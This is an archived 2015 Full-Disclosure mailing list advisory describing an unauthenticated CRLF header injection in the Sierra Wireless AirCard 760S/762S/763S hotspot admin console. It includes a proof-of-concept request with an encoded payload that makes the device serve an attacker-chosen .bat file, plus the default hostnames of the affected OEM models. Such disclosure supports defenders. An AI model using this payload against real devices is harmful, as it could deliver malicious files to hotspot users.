lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAOrvnT=ruEkx1qqotbP2CruvLKLBX7z6DQ_s8LKFHXwWciBemQ@mail.gmail.com>
Date: Wed, 14 Jan 2015 11:38:56 +1100
From: Luke Walker <luke@...ckduck.nu>
To: fulldisclosure@...lists.org
Subject: [FD] Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF
	Injection

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

[*] Overview

Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.

The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.

[*] Description

The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered.

http://​<routerURL>/export.cfg?save=export.cfg


[*] Traffic sample from POC

(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)

> GET /export.cfg?save=
> export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a
> &sessionId=00000001%2DhYL4H
> 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> > User-Agent: curl/7.40.0
> > Host: router.4g
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> < Server: httpd/2.7 (sierra; D4C)
> < Date: Mon, 12 Jan 2015 05:32:38 GMT
> < Connection: keep-alive
> < Cache-Control: no-cache
> < Content-Disposition: attachment; filename=export.bat
> < Content-type: application/bat
>
> pause


> Content-type: application/octet-stream
> Transfer-encoding: chunked
> 3a
> #
> # Configuration export from Telstra WI-FI 4G
> #
> # Model:


[*] Limitations

While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.

However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:

* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g

[*] Workaround

Change the name and IP address of the device to something other than the
default settings.

[*] Vendor Contact

An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.

​regards
,
Luke

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists